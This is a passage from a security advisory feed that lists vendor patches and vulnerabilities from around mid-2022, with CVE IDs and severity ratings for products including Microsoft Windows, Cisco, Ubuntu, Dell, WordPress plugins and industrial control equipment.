Pyxis. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-22767 (High), CVE-2022-30277 (Medium)
A stored Cross-Site Scripting (XSS) vulnerability in WordPress plugins Google Tag Manager
for WordPress (GTM4WP) and Cross-Site Request Forgery vulnerability in WordPress plugins
WPMK Ajax Finder have been discovered. The updates are available for Google Tag Manager for
WordPress (GTM4WP). CVE ID: CVE-2022-1961 (Medium), CVE-2022-1749 (High)
Stack-based Buffer Overflow vulnerability has been discovered in Fuji Electric's Equipment-
Alpha7 PC Loader. Successful exploitation of this vulnerability can allow arbitrary code
execution. CVE ID: CVE-2022-1888 (High)
Dell has released security update for Dell EMC Unisphere Central to address multiple
third-party component vulnerabilities that can be exploited by malicious users to compromise
the affected system. CVE ID: CVE-2021-44832 (Medium), CVE-2022-22720 (Critical), CVE-2022-22721 (Critical)
A remote code execution vulnerability has been discovered in Windows when Microsoft Support
Diagnostic Tool (MSDT) is called using the URL protocol from a calling application such as
Word. An attacker who successfully exploits this vulnerability can run arbitrary code with
the privileges of the calling application. CVE ID: CVE-2022-30190 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-1664, CVE-2022-27406 (High), CVE-2021-46790 (Critical),
CVE-2019-13050 (High)
Data breach/falsification and resource exhaustion vulnerability have been discovered in CAMS
for HIS. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Ubuntu has released security updates to address multiple vulnerabilities in Subversion
servers. The affected products are Ubuntu 22.04 LTS. CVE ID: CVE-2021-28544 (Medium), CVE-2022-24070 (High)
Red Hat has released security updates to address multiple vulnerabilities in several
products. CVE ID: CVE-2022-1529 (Critical), CVE-2022-1802 (Critical)
Multiple vulnerabilities have been discovered in Keysight Technologies' equipment- N6854A
Geolocation server and N6841A RF Sensor software. Successful exploitation of these
vulnerabilities can allow an attacker to obtain arbitrary operating system files and execute
arbitrary code. CVE ID: CVE-2022-1661 (High), CVE-2022-1660 (Critical)
Horner Automation has released a security update to resolve multiple vulnerabilities in
Horner Automation's equipment- Cscape Csfont. Successful exploitation can cause the
execution of arbitrary code by opening a malicious file. CVE ID: CVE-2022-27184 (High), CVE-2022-28690 (High), CVE-2022-29488 (High),
CVE-2022-30540 (High)
Google has released updated Chrome 103 Beta channel 103.0.5060.24 & Dev channel 104.0.5083.0
for Windows, Mac and Linux, Beta channel 103.0.5060.22 (Platform version: 14816.25.0) for
most ChromeOS devices and Chrome Dev 104 (104.0.5082.0) & Chrome Beta 103 (103.0.5060.22)
for Android.
QNAP NAS has released security updates to address a Cross Site Request Forgery (CSRF)
vulnerability in QNAP NAS running Proxy server that allows remote attackers to inject
malicious code. CVE ID: CVE-2021-34360 (Medium)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Citrix has released security updates to address multiple vulnerabilities in Citrix ADC and
Citrix Gateway that can result in a Denial of Service (DoS). CVE ID: CVE-2022-27507 (Medium), CVE-2022-27508 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Red Hat has released security updates to address multiple vulnerabilities in several
products. CVE ID: CVE-2018-25032 (High), CVE-2022-1271 (High), CVE-2022-1677 (Medium)
Google has released Chrome Dev 103 (103.0.5060.22) & Chrome 102 (102.0.5005.58,
102.0.5005.59) for Android, Chrome 102 stable channel 102.0.5005.61 for Mac and Linux, and
Chrome 102 (102.0.5005.67) for iOS to resolve multiple vulnerabilities. CVE ID: CVE-2022-1853 (Critical)
An uncontrolled resource consumption vulnerability has been discovered in Rockwell
Automation's equipment- Logix Controllers. Successful exploitation by an unauthorized user
by sending malicious messages can cause Denial of Service (DoS) condition. The mitigations
are available. CVE ID: CVE-2022-1797 (Medium)
An improper access control vulnerability has been discovered in Matrikon's equipment-
Matrikon OPC Server. Successful exploitation can cause Remote Command Execution (RCE) with
system-level privileges through the support of the IPersistFile COM interface. The
mitigations are available. CVE ID: CVE-2022-1261 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
VMware has released a security update to address an XML External Entity (XXE) vulnerability
in VMware Tools for Windows that can cause Denial of Service (DoS) condition or unintended
information disclosure. The affected products are VMware Tools for Windows version 12.0.0,
11.x.y and 10.x.y. CVE ID: CVE-2022-22977 (Medium)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Mitsubishi Electric has released security updates and workarounds to resolve multiple
vulnerabilities in its TCP Protocol Stack and Multiple FA Engineering software
products. CVE ID: CVE-2021-20587 (High), CVE-2021-20588 (High), CVE-2020- 14521,
CVE-2020-16226, CVE-2020-14496
Zyxel has released security updates to address multiple vulnerabilities in Zyxel firewalls,
AP controllers and APs. CVE ID: CVE-2022-0734, CVE-2022-26531, CVE-2022-26532, CVE-2022-0910 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
SUSE has released security updates to resolve a vulnerability in Linux Kernel that can cause
a Denial of Service (DoS) or a kernel information leak. CVE ID: CVE-2022-1280 (Medium)
Mozilla has released security updates to address multiple vulnerabilities in Firefox
100.0.2, Firefox for Android 100.3.0, Firefox ESR 91.9.1, and Thunderbird 91.9.1. An
attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-1802 (Critical), CVE-2022-1529 (Critical)
Cisco has released security updates to resolve a vulnerability in the health check RPM of
Cisco IOS XR software that can allow an unauthenticated, remote attacker to access the Redis
instance that runs within the NOSi container. CVE ID: CVE-2022-20821 (Medium)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Ubuntu has released security update to resolve SQL injection vulnerability in OpenLDAP. The
affected products are Ubuntu 14.04 ESM & Ubuntu 16.04 ESM. CVE ID: CVE-2022-29155 (Critical)
Dell has released security updates for Dell EMC VxRail Appliance and Dell EMC Elastic Cloud
Storage to resolve multiple third-party vulnerabilities that can be exploited by malicious
users to compromise the affected system.
Google has released Chrome Beta 103 (103.0.5060.10) for iOS, Chrome Dev 103 (103.0.5060.13)
for Android, and Dev channel 103.0.5060.13 for Windows, Mac and Linux.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities have been discovered in NETGEAR BR200 and BR500 routers that can be
exploited if a user visits a malicious website or clicks a malicious link while accessing
the router's management GUI. The mitigations are available.
WordPress has released a security update to resolve a Cross-Site Scripting (XSS)
vulnerability in Google Tag Manager plugin for WordPress. The affected versions are Google
Tag Manager versions up to and including 1.15. CVE ID: CVE-2022-1707 (Medium)
Apple has released security updates to address multiple vulnerabilities in iTunes for
Windows. An attacker can exploit these vulnerabilities to take control of an affected
device. CVE ID: CVE-2022-26751, CVE-2022-26711, CVE-2022-26774, CVE-2022-26773,
CVE-2022-26717
BIND has released security update to address an assertion failure vulnerability. The
affected products are BIND 9.18.0 -9.18.2 and 9.19.0 of the BIND 9.19 development
branch. CVE ID: CVE-2022-1183 (High)
VMware has released security updates to resolve authentication bypass and local privilege
escalation vulnerabilities in its products. An attacker can exploit these vulnerabilities to
take control of an affected system. CVE ID: CVE-2022-22972 (Critical), CVE-2022-22973 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-1736, CVE-2022-1183, CVE-2016-7947 (Critical), CVE-2016-7948
(Critical)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Dell has released security updates to resolve critical vulnerabilities in Dell Technologies
PowerProtect Data Domain and Dell EMC Enterprise Hybrid Cloud. CVE ID: CVE-2022-24422 (Critical), CVE-2022-22972 (Critical)
Multiple vulnerabilities have been discovered in several Jenkins Plugin. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Stack-based buffer overflow vulnerability has been discovered in Circutor's equipment-
COMPACT DC-S BASIC. Successful exploitation can cause Remote Code Execution (RCE). CVE ID: CVE-2022-1669 (Medium)
Wordfence has released a security update to resolve unauthenticated SQL Injection
vulnerability in RSVPMaker plugin for WordPress. The affected versions are RSVPMaker
versions up to and including 9.3.2. CVE ID: CVE-2022-1768 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
An integer overflow vulnerability has been discovered in Spring by VMware. The affected
products are Spring Security versions 5.5.x prior to 5.5.7, 5.6.x prior to 5.6.4, and older
unsupported versions. The mitigations are available. CVE ID: CVE-2022-22976 (Medium)
Zoom has released security updates to resolve multiple vulnerabilities in Zoom Client for
Meetings affecting several platforms. An attacker can exploit these vulnerabilities to take
control of an affected system. CVE ID: CVE-2022-22787 (Medium), CVE-2022-22786 (High), CVE-2022-22785 (Medium),
CVE-2022-22784 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Mitsubishi Electric has released security updates to address multiple Denial-of-Service
(DoS) vulnerabilities in the MELSEC iQ-F series CPU module. CVE ID: CVE-2022-25161 (High), CVE-2022-25162 (Medium)
Synology has released security updates for Synology Calendar to address a vulnerability that
allows remote authenticated users to inject arbitrary web script or HTML via a susceptible
version of Synology Calendar.
Apple has released security updates to resolve vulnerabilities in multiple products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
NVIDIA has released security updates to resolve multiple vulnerabilities in the NVIDIA GPU
Display Driver which can lead to Denial of Service(DoS), information disclosure, or data
tampering.
Spring has released security updates to address an authorization bypass vulnerability in
RegexRequestMatcher. The affected products are Spring Security versions 5.5.6 and 5.5.7 and
older unsupported versions. CVE ID: CVE-2022-22975 (High)
Dell has released security updates for Dell EMC RecoverPoint to address multiple
vulnerabilities that can be exploited by malicious users to compromise the affected
system. CVE ID: CVE-2021-4034, CVE-2021-44832
A vulnerability has been discovered in Apache Tomcat 9.0.0.M1 to 9.0.20, Apache Tomcat 8.5.0
to 8.5.75. An attacker can exploit this vulnerability to obtain sensitive information. The
mitigations are available. CVE ID: CVE-2022-25762 (High)
Delta Electronics has released a security update to address stack-based buffer overflow and
out-of-bounds read vulnerabilities in Delta Electronics' equipment- CNCSoft. Successful
exploitation can allow arbitrary code execution or information disclosure. CVE ID: CVE-2022-1405 (High), CVE-2022-1404 (Low)
Inkscape has released a security update to address multiple vulnerabilities in its product
Inkscape Version 0.91. Successful exploitation of these vulnerabilities can allow
unauthorized information disclosure and code execution. CVE ID: CVE-2021-42700 (Low), CVE-2021-42702 (Low), CVE-2021-42704 (High)
Cambium Networks has released security updates to address multiple vulnerabilities in
Cambium Networks' equipment- cnMaestro. Successful exploitation can cause Remote Code
Execution (RCE), sensitive data exfiltration and complete takeover of the main multi-tenant
cloud infrastructure. CVE ID: CVE-2022-1357 (Critical), CVE-2022-1358 (Medium), CVE-2022-1361 (High),
CVE-2022-1360 (High), CVE-2022-1362 (Medium), CVE-2022-1359 (Medium), CVE-2022-1356 (High)
Zyxel has released security updates to address an OS command injection vulnerability in its
products. A command injection vulnerability in the CGI program of some firewall versions can
allow an attacker to modify specific files and then execute some OS commands on a vulnerable
device. CVE ID: CVE-2022-30525
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
SUSE has released security updates to resolve multiple vulnerabilities in several products.
CVE ID: CVE-2022-20770 (High), CVE-2022-20771 (High), CVE-2022-20785 (High),
CVE-2022-20792, CVE-2022-20796 (Medium)
It has been discovered that Dell BIOS contains an improper input validation vulnerability. A
local authenticated malicious user can exploit this vulnerability by using an SMI to gain
arbitrary code execution during SMM. CVE ID: CVE-2022-24417 (High), CVE-2022-24418 (High)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-20681 (High), CVE-2022-20677 (Medium), CVE-2022-20718 (Medium),
CVE-2022-20719 (Medium)
Google has released Chrome Dev 103 (103.0.5055.0) for Android, Dev channel 103.0.5056.0 for
Linux and Mac, 103.0.5057.3 for Windows, Stable channel 101.0.4951.67 for Windows, Chrome
Beta 102 (102.0.5005.50) for iOS and Android.
Mitsubishi Electric has released security update to address multiple vulnerabilities
discovered in the Open Source Software (OSS) used by VisualSVN Server of Mitsubishi
Electric's equipment- MELSOFT iQ AppPortal. Exploitation of these vulnerabilities can allow
attacker to disclose or tamper with information within the product, cause a Denial of
Service (DoS) conditions or execute malicious programs. CVE ID: CVE-2020-13938 (Medium), CVE-2021-26691 (Critical), CVE-2021-34798 (High),
CVE-2021-3711 (Critical), CVE-2021-44790 (Critical), CVE-2022-22720 (Critical),
CVE-2022-23943 (Critical), CVE-2022-0778 (High)
Ubuntu has released security updates to address several vulnerabilities in Linux kernel. An
attacker can exploit these vulnerabilities to take control of an affected system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Spring has released security updates to resolve multiple denial of service vulnerabilities
discovered in various Spring products. CVE ID: CVE-2022-22971 (Medium), CVE-2022-22970 (Medium)
HP has released security updates to mitigate multiple vulnerabilities discovered in the BIOS
(UEFI Firmware) for certain HP PC products, which can allow arbitrary code execution. CVE ID: CVE-2021-3808 (High), CVE-2021-3809 (High)
Dell has released security update to address a Reflected Cross-Site Scripting vulnerability
in the Unisphere UI of Dell Unity, Dell UnityVSA, and Dell UnityXT. Exploitation of this
vulnerability can lead to information disclosure, session theft, or client-side request
forgery. CVE ID: CVE-2022-29091 (Medium)
SUSE has released security updates to resolve multiple vulnerabilities in several
products. CVE ID: CVE-2021-28688 (Medium), CVE-2021-39713 (Critical), CVE-2022-1011 (High),
CVE-2022-0330 (High), CVE-2022-1158
Multiple vulnerabilities have been discovered in the firmware and libraries utilized by
RAD-ISM-900-EN-BD devices of Phoenix Contact. These vulnerabilities can allow an attacker to
execute arbitrary shell commands and/or upload arbitrary files to the device with root
privileges. The family of RAD-ISM-900-EN-BD devices is end of life and will not receive
updates anymore.
CVE ID: CVE-2022-29897 (Critical), CVE-2022-29898 (Critical)
Microsoft has released updates to address multiple vulnerabilities in its software. An
attacker can exploit some of these vulnerabilities to take control of an affected system.
A spoofing vulnerability has been discovered in the Windows Local Security Authority (LSA).
An unauthenticated attacker can call a method on the LSARPC interface and coerce the domain
controller to authenticate to the attacker using NTLM. CVE ID: CVE-2022-26925 (High)
Hitachi Energy has released security update to address multiple vulnerabilities in Hitachi
Energy's equipment- TXpert Hub CoreTec 4. An attacker can exploit these vulnerabilities to
take control of the system node. CVE ID: CVE-2021-3156 (High), CVE-2021-35530 (Medium), CVE-2021-35531 (Medium),
CVE-2021-35532 (Medium)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Intel has released security updates to address multiple vulnerabilities in its products. A
remote attacker can exploit these vulnerabilities to take control of an affected system.
Google has released updated Extended Stable channel 100.0.4896.160 for Windows and Mac, and
Stable channel 101.0.4951.64 for Windows, Mac and Linux to resolve multiple
vulnerabilities. CVE ID: CVE-2022-1633 (High), CVE-2022-1634 (High), CVE-2022-1635 (High),
CVE-2022-1636 (High), CVE-2022-1637 (High), CVE-2022-1638 (High), CVE-2022-1639 (High),
CVE-2022-1640 (High), CVE-2022-1641 (Medium)
Microsoft has released security updates to address a Remote Code Execution vulnerability in
Windows LDAP. An unauthenticated attacker can send a specially crafted request to a
vulnerable server. Successful exploitation can result in the attacker's code running in the
context of the SYSTEM account. CVE ID: CVE-2022-29130 (Critical)
Microsoft has released security updates to address a Remote Code Execution vulnerability in
Windows LDAP. An unauthenticated attacker can send a specially crafted request to a
vulnerable server. This vulnerability is only exploitable if the MaxReceiveBuffer LDAP
policy is set to a value higher than the default value. Successful exploitation can result
in the attacker's code running in the context of the SYSTEM account. CVE ID: CVE-2022-22012 (Critical)
Microsoft has released security updates to address a Remote Code Execution vulnerability in
Windows Network File System. This vulnerability can be exploited over the network by making
an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger
a Remote Code Execution. CVE ID: CVE-2022-26937 (Critical)
Microsoft's Windows 11 Update KB5012643 appears to affect some .NET Framework 3.5 apps. The
affected apps are using certain optional components in .NET Framework 3.5, such as Windows
Communication Foundation (WCF) and Windows Workflow (WWF) components. Microsoft has released
workaround to mitigate the issue.
Mitsubishi Electric has released security updates to resolve multiple vulnerabilities in
MELSOFT GT OPC UA Client and Wireless Communication Standards IEEE 802.11.
Microsoft has released a security update to address a remote code execution vulnerability
affecting Azure Data Factory and Azure Synapse Pipelines. The vulnerability was discovered
in the third-party ODBC data connector used to connect to Amazon Redshift in Azure Data
Factory Integration Runtime (IR) and Azure Synapse Pipelines. A remote attacker can exploit
this vulnerability to take control of an affected system. CVE ID: CVE-2022-29972
It has been discovered that the uClibc and uClibc-ng libraries are vulnerable to DNS cache
poisoning due to the use of predictable DNS transaction IDs when making DNS requests. This
vulnerability can allow an attacker to perform DNS cache poisoning attacks against a
vulnerable environment.
Ubuntu has released security update to address an use-after-free vulnerability, caused by
the incorrect handling of usernames sharing the same UID. An attacker can use this
vulnerability to crash DBus that can result in a denial of service. CVE ID: CVE-2020-35512 (High)
Google Chrome has released Chrome 101 (101.0.4951.61) for Android and Stable channel
101.0.4951.59 (Platform version: 14588.98.0) for most Chrome OS devices to resolve multiple
vulnerabilities. CVE ID: CVE-2022-1633 (High), CVE-2022-1634 (High), CVE-2022-1635 (High),
CVE-2022-1636 (High), CVE-2022-1637 (High), CVE-2022-1638 (High), CVE-2022-1639 (High),
CVE-2022-1640 (High), CVE-2022-1641 (High)
Foxit has released Foxit PDF Reader 11.2.2 and Foxit PDF Editor 11.2.2 to resolve multiple
vulnerabilities in Foxit PDF Reader 11.2.1.53537 and earlier versions, Foxit PDF Editor
11.2.1.53537 and all previous 11.x versions, 10.1.7.37777 and earlier versions.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
It has been discovered that Solana rBPF is affected by Incorrect Calculation vulnerability
which is caused by improper implementation of sdiv instruction. This vulnerability can lead
to the wrong execution path, which can result in huge loss in specific cases. CVE ID: CVE-2022-23066 (Critical)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
It has been discovered that due to a vulnerability in the yank action, any RubyGems.org user
can remove and replace certain gems even if that user was not authorized to do so. CVE ID: CVE-2022-29176 (Critical)
It has been discovered that multiple Tecson Tankspion and GOKs SmartBox products have been
affected by a vulnerability that does not properly restrict access to an endpoint which is
responsible for saving settings, to an unauthenticated user with limited access
rights. CVE ID: CVE-2019-12254 (Critical)
Ubuntu has released security updates to address several vulnerabilities in Cron. An attacker
can exploit these vulnerabilities to take control of an affected system. CVE ID: CVE-2019-9706 (Medium), CVE-2019-9705 (Medium), CVE-2017-9525 (Medium),
CVE-2019-9704 (Medium)
It has been observed that Lazarus Group famous for cryptocurrency theft is widening its
scope into using ransomware strain VHD in the Asia-Pacific (APAC) region. Their tactics
include spear-phishing emails as well as the use of fake mobile applications.
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Johnson Controls has released security updates to resolve a vulnerability in all Metasys
ADS/ADX/OAS 10 and 11 versions. Under certain circumstances, an authenticated user can lock
other users out of the system or take over their accounts. CVE ID: CVE‐2022‐21934
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-20777 (Critical), CVE-2022-20779 (High), CVE-2022-20780 (High),
CVE-2022-20796 (Medium), CVE-2022-20785 (Medium), CVE-2022-20770 (Medium), CVE-2022-20771
(Medium), CVE-2022-20734 (Medium), CVE-2022-20799 (Medium), CVE-2022-20801 (Medium),
CVE-2022-20753 (Medium), CVE-2022-20764 (Medium), CVE-2022-20794 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Dell has released a security update to address multiple vulnerabilities in Dell EMC
NetWorker vProxy. The affected versions are Dell EMC NetWorker vProxy 4.3.0-17 and earlier.
Drupal has released security updates to address multiple vulnerabilities in various Drupal
modules. Drupal will not support the Duo Two-Factor Authentication module anymore.
Missing Authentication for Critical Function vulnerability has been discovered in BIG-IP.
This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP
system through the management port and/or self IP addresses to execute arbitrary system
commands, create or delete files, or disable services. CVE ID: CVE-2022-1388 (Critical)
Multiple heap overflow vulnerabilities have been discovered in several Aruba products.
Successful exploitation of these vulnerabilities can result in the ability to execute
arbitrary code. The updates are available. CVE ID: CVE-2022-23676 (Critical), CVE-2022-23677 (Critical)
Cisco has released security updates to address a privilege escalation vulnerability in the
web services interface for remote access VPN features in multiple versions of Cisco Adaptive
Security Appliance (ASA) software and Cisco Firepower Threat Defense (FTD) software. CVE ID: CVE-2022-20759 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in Yokogawa equipment's- CENTUM and ProSafe-RS
which can allow leakage/tampering of data, cause a Denial-of-Service (DoS) condition, or
allow a local attacker to execute arbitrary programs. The mitigations are available. CVE ID: CVE-2022-27188 (Medium), CVE-2022-26034 (Medium), CVE-2019-0203 (High),
CVE-2018-11782 (Medium), CVE-2015-0248 (Medium)
Wordfence has released a security update to resolve a Cross-Site Scripting (XSS)
vulnerability in WP JS plugin for WordPress. The affected versions are WP JS versions up to
and including 2.0.6. CVE ID: CVE-2022-1567 (Medium)
Mozilla has released security updates to address multiple vulnerabilities in Firefox 100 and
Firefox ESR 91.9. An attacker can exploit these vulnerabilities to take control of an
affected system. CVE ID: CVE-2022-29914 (High), CVE-2022-29909 (High), CVE-2022-29916 (High),
CVE-2022-29911 (High), CVE-2022-29912 (High), CVE-2022-29910 (High), CVE-2022-29915 (High),
CVE-2022-29917 (High), CVE-2022-29918 (High)
Moxa has released security updates to address Remote Code Execution (RCE) vulnerability in
Moxa's equipment- MXview series. An attacker with local privilege can gain system privilege
and execute arbitrary code via a crafted module.
OpenSSL has released security updates to address multiple vulnerabilities in its products.
CVE ID: CVE-2022-1473 (Low), CVE-2022-1434 (Low), CVE-2022-1343, CVE-2022-1292
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities related to open-source software have been observed in Hitachi
Energy Gateway Station (GWS) and Hitachi Energy FACTS Control Platform (FCP) Products.
Successful exploitations can eavesdrop on traffic between a network source and destination,
gain unauthorized access to information, or cause a Denial-of Service (DoS).
Missing authentication for critical function vulnerability has been discovered in multiple
version of TRUMPF TruTops Boost, TruTops Fab & TruTops Monitor products. Execution of
this function can result in unauthorized access to change of data or disruption of the whole
service. CVE ID: CVE-2022-1300 (Critical)
Ubuntu releases security update to resolve vulnerability in libinput of Ubuntu 22.04 LTS
which caused libinput to crash or expose sensitive information.
Red Hat has released security updates to address multiple vulnerabilities in several
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Dell has released security updates to resolve multiple vulnerabilities in several products.
An attacker can exploit these vulnerabilities to take control of an affected system. CVE ID: CVE-2022-1215
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system.
Wordfence has released security updates to resolve a vulnerability in Ultimate Member plugin
in WordPress. The affected versions are Ultimate Member plugin versions up to and including
2.3.1. CVE ID: CVE-2022-1209 (Medium)
CISCO has released security updates to resolve Spring Framework vulnerability in its
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-22965 (Critical)
Tychon has released a security update to resolve a privilege escalation vulnerability due to
the use of an OPENSSLDIR variable which can cause arbitrary code execution with system
privileges. CVE ID: CVE-2022-26872
A privilege escalation vulnerability has been discovered in Windows software that uses Qt
versions prior to 5.14. The update is available. CVE ID: CVE-2022-26873
NVIDIA has released a software update for the Windows versions of Omniverse Nucleus and
Omniverse Cache to address a security issue that may lead to arbitrary code execution,
impacting confidentiality, integrity, and availability. CVE ID: CVE-2022-28198
Dell EMC NetWorker remediation is available for multiple security vulnerabilities. These
vulnerabilities may be exploited by malicious actors to compromise the affected system.
CVE ID: CVE-2022-29082
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-20714 (High), CVE-2022-20743 (High), CVE-2022-20740 (Medium)
Google Chrome has released updated Chrome Dev 103 (103.0.5028.0) for Android, Beta channel
Chrome 102.0.5005.27 for Windows, Mac and Linux, Dev channel 103.0.5028.0 for Windows,
Linux, and Mac, Chrome Beta 102 (102.0.5005.26) for Android, and LTS channel 96.0.4664.207
(Platform Version: 14268.82.0) for most ChromeOS devices to resolve multiple
vulnerabilities. CVE ID: CVE-2022-1312 (High), CVE-2022-1308 (High), CVE-2022-1311 (High),
CVE-2022-1125 (High), CVE-2022-1139 (Medium), CVE-2022-1364 (High)
Wordfence has released security updates to resolve an arbitrary file deletion vulnerability
in All-in-One WP Migration plugin. The affected versions are All-in-One WP Migration
versions up to and including 7.58. CVE ID: CVE-2022-1476 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Johnson Controls has released security updates to address a vulnerability that impacts
Metasys ADS/ADX/OAS Servers. Under certain circumstances an authenticated user can elevate
their privileges to Administrator. CVE ID: CVE‐2021‐36207
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Multiple vulnerabilities have been discovered in that allow remote attackers to obtain
sensitive information and possibly execute arbitrary code via a susceptible version of
Synology DiskStation Manager (DSM) and Synology Router Manager (SRM). Fixes are available
for some products. CVE ID: CVE-2022-0194, CVE-2022-23121, CVE-2022-23122, CVE-2022-23123,
CVE-2022-23124, CVE-2022-23125
Microsoft has released security updates to address a vulnerability in Azure Database for
PostgreSQL Flexible Server that can result in unauthorized cross-account database access in
a region.
A vulnerability has been discovered in Oracle Communications Billing and Revenue Management,
a product of Oracle Communications Applications, which can cause an unauthenticated attacker
with network access via TCP to compromise it. The affected versions are 12.0.0.4 and
12.0.0.5. CVE ID: CVE-2022-21431 (Critical)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in Zoom, affecting several platforms. An
attacker can exploit these vulnerabilities to take control of an affected system. The
updates are available. CVE ID: CVE-2022-22783 (High), CVE-2022-22782 (High), CVE-2022-22781 (High)
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
HP has released security updates for Teradici PCoIP Software and Firmware that remediate
vulnerabilities discovered in libexpat prior to version 2.4.7. CVE ID: CVE-2022-22822 (Critical), CVE-2022-22823 (Critical), CVE-2022-22824
(Critical), CVE-2021-45960 (High), CVE-2022-22825 (High), CVE-2022-22826 (High),
CVE-2022-22827 (High), CVE-2021-46143 (High)
Philips has released security updates to resolve multiple vulnerabilities in several
products. CVE ID: CVE-2022-26809 (Critical), CVE-2022-26784(Medium)
Huawei has released a security update to address a buffer overflow vulnerability in Huawei
product. Successful exploitation of this vulnerability can lead to privilege escalation.
CVE ID: CVE-2022-29797 (Critical)
ASUS has released a security update to resolve multiple vulnerabilities in ASUS RT-AX88U
firmware. It is recommended that users update to the 3.0.0.4.386.46065 or newer version.
CVE ID: CVE-2022-26673 (Medium), CVE-2022-26674 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Microsoft has discovered multiple vulnerabilities, collectively referred to as Nimbuspwn,
that can allow an attacker to elevate privileges to root on many Linux desktop endpoints.
These vulnerabilities can be chained together to gain root privileges on Linux systems,
allowing attackers to deploy payloads, like a root backdoor, and perform other malicious
actions via arbitrary root code execution. The updates are available. CVE ID: CVE-2022-29799 (High), CVE-2022-29800 (High)
Cisco has released security updates to resolve Denial of Service (DoS) vulnerability in the
Modbus preprocessor of the Snort detection engine. This vulnerability affects all open
source Snort project releases earlier than Release 2.9.19 and Release 3.1.11.0. CVE ID: CVE-2022-20685 (High)
Dell has released a security update to address an authentication bypass vulnerability in
Dell SupportAssist OS Recovery, which can be exploited by malicious users to compromise the
affected system. CVE ID: CVE-2022-26865 (Medium)
NVIDIA has released security updates to resolve multiple vulnerabilities in its JetPack
Software Development Kit (SDK) which can cause Denial of Service (DoS), escalation of
privileges, and may impact data integrity and confidentiality. CVE ID: CVE-2022-28193 (High), CVE-2022-28194 (High), CVE-2022-28195 (Medium),
CVE‑2022-28196 (Medium), CVE-2022-28197 (Medium)
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Wordfence has released a security update to resolve SQL Injection vulnerability in
